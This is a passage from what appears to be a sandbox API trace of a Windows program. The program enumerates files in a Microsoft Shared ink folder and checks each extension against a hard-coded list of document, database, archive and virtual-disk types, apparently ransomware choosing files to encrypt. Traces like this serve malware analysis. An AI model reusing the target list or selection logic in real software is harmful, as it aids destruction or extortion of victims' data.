| out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" [0039.952] PathFindExtensionW (pszPath="hwrusalm.dat") returned=".dat" [0039.952] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dat.") returned 5 [0039.952] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dat.") returned 0x0 [0039.952] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.952] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="hwrusash.dat" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" [0039.953] PathFindExtensionW (pszPath="hwrusash.dat") returned=".dat" [0039.953] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dat.") returned 5 [0039.953] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dat.") returned 0x0 [0039.953] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.953] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="InkDiv.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll" [0039.953] PathFindExtensionW (pszPath="InkDiv.dll") returned=".dll" [0039.953] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0039.953] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0039.953] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.953] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="InkObj.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" [0039.953] PathFindExtensionW (pszPath="InkObj.dll") returned=".dll" [0039.953] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0039.953] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0039.954] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.954] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="InkWatson.exe" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe" [0039.954] PathFindExtensionW (pszPath="InkWatson.exe") returned=".exe" [0039.954] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".exe.") returned 5 [0039.954] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0039.954] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.954] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="InputPersonalization.exe" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe" [0039.954] PathFindExtensionW (pszPath="InputPersonalization.exe") returned=".exe" [0039.954] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".exe.") returned 5 [0039.954] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0039.954] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.954] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipscat.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" [0039.954] PathFindExtensionW (pszPath="ipscat.xml") returned=".xml" [0039.954] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.954] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.955] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.957] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipschs.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" [0039.957] PathFindExtensionW (pszPath="ipschs.xml") returned=".xml" [0039.957] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.957] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.958] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.958] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipscht.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" [0039.958] PathFindExtensionW (pszPath="ipscht.xml") returned=".xml" [0039.958] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.958] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.958] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.958] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipscsy.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" [0039.958] PathFindExtensionW (pszPath="ipscsy.xml") returned=".xml" [0039.958] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.958] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.958] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.958] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsdan.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" [0039.958] PathFindExtensionW (pszPath="ipsdan.xml") returned=".xml" [0039.958] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.958] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.958] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.958] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsdeu.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" [0039.959] PathFindExtensionW (pszPath="ipsdeu.xml") returned=".xml" [0039.959] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.959] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.959] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.959] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsen.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" [0039.959] PathFindExtensionW (pszPath="ipsen.xml") returned=".xml" [0039.959] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.959] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.959] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.959] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsesp.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" [0039.959] PathFindExtensionW (pszPath="ipsesp.xml") returned=".xml" [0039.959] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.959] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.960] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.960] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="IPSEventLogMsg.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll" [0039.960] PathFindExtensionW (pszPath="IPSEventLogMsg.dll") returned=".dll" [0039.960] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0039.960] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0039.960] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.960] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsfin.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" [0039.960] PathFindExtensionW (pszPath="ipsfin.xml") returned=".xml" [0039.960] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.960] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.960] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.960] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsfra.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" [0039.960] PathFindExtensionW (pszPath="ipsfra.xml") returned=".xml" [0039.960] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.960] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.960] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.960] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipshrv.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" [0039.960] PathFindExtensionW (pszPath="ipshrv.xml") returned=".xml" [0039.960] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.961] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.961] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.961] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsita.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" [0039.961] PathFindExtensionW (pszPath="ipsita.xml") returned=".xml" [0039.961] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.961] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.961] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.961] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsjpn.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" [0039.961] PathFindExtensionW (pszPath="ipsjpn.xml") returned=".xml" [0039.961] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.961] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.961] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.961] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipskor.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" [0039.961] PathFindExtensionW (pszPath="ipskor.xml") returned=".xml" [0039.961] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.961] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.961] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.961] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="IpsMigrationPlugin.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll" [0039.962] PathFindExtensionW (pszPath="IpsMigrationPlugin.dll") returned=".dll" [0039.962] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0039.962] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0039.962] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.962] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsnld.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" [0039.962] PathFindExtensionW (pszPath="ipsnld.xml") returned=".xml" [0039.962] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.962] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.962] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.962] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsnor.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" [0039.962] PathFindExtensionW (pszPath="ipsnor.xml") returned=".xml" [0039.962] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.962] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.962] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.962] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsplk.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" [0039.962] PathFindExtensionW (pszPath="ipsplk.xml") returned=".xml" [0039.962] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.962] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.962] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.963] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="IpsPlugin.dll" | out: 